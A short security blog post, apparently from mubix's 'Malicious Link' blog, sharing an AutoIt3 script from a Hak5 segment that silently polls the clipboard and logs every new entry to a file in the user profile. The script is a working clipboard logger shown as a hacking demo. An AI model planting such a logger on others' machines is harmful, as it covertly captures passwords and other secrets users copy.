Quantcast
Channel: All Posts - Malicious Link - Blog by mubix - Rob Fuller
Viewing all articles
Browse latest Browse all 1156

Hak5 Segment Sneak Peak

$
0
0
Since it’s Christmas and all, I thought I’d post the code snippet from my Hak5 segment a bit early: #include <Clipboard.au3> #include <File.au3> $oldclip = "" While 1 $clip = _ClipBoard_GetData() If $clip <> "0" Then If $clip <> $oldclip Then _FileWriteLog(@UserProfileDir & "clip.log", $clip) $oldclip = $clip EndIf EndIf Sleep(100) WEnd It’s pretty straight forward, and I welcome everyone to install AutoIt3 and compile/run the above script to see what it does (although most of you I’m sure can figure it out just by reading it).

Viewing all articles
Browse latest Browse all 1156

Trending Articles